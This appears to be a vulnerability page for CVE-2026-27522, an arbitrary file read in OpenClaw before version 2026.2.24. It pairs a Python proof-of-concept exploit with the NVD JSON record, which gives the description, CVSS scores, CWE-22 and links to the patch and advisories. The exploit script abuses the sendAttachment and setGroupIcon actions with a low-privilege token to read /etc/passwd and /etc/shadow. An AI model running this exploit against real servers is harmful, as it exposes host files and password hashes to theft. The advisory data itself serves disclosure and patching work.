CVE-2026-27522

import requests # CVE-2026-27522 PoC - OpenClaw Local File Read via media root bypass # Target: OpenClaw < 2026.2.24 TARGET_URL = "http://target-server:8080/api" ATTACKER_TOKEN = "low_privilege_user_token" def exploit_file_read(file_path): """ Exploit sendAttachment action to read local files file_path: Absolute path to read (e.g., /etc/passwd, C:\\Windows\\win.ini) """ headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Method 1: sendAttachment action payload = { "action": "sendAttachment", "chat_id": "victim_chat", "file_path": file_path, # e.g., "file:///etc/passwd" "filename": "malicious_file" } response = requests.post(TARGET_URL, json=payload, headers=headers) return response.text def exploit_setgroupicon(file_path): """ Exploit setGroupIcon action to read local files file_path: Absolute path to read """ headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } payload = { "action": "setGroupIcon", "group_id": "target_group", "icon_path": file_path # e.g., "file:///etc/shadow" } response = requests.post(TARGET_URL, json=payload, headers=headers) return response.text # Example usage if __name__ == "__main__": # Read /etc/passwd on Linux print("[*] Attempting to read /etc/passwd...") result = exploit_file_read("file:///etc/passwd") print(result) # Read shadow file (if permissions allow) print("[*] Attempting to read /etc/shadow...") result = exploit_file_read("file:///etc/shadow") print(result)

{"cve": {"id": "CVE-2026-27522", "sourceIdentifier": "[email protected]", "published": "2026-03-18T02:16:23.220", "lastModified": "2026-03-18T20:05:50.113", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.24 contain a local media root bypass vulnerability in sendAttachment and setGroupIcon message actions when sandboxRoot is unset. Attackers can hydrate media from local absolute paths to read arbitrary host files accessible by the runtime user."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a 2026.2.24 contienen una vulnerabilidad de omisión de la raíz de medios local en las acciones de mensaje sendAttachment y setGroupIcon cuando sandboxRoot no está configurado. Los atacantes pueden hidratar medios desde rutas absolutas locales para leer archivos de host arbitrarios accesibles por el usuario en tiempo de ejecución."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.24", "matchCriteriaId": "673E4DE2-44C4-485D-8BDF-6DEEB32C1A98"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/270ab03e379f9653e15f7033c9830399b66b7e51", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fqcm-97m6-w7rm", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-sendattachment-and-setgroupicon-message-actions", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}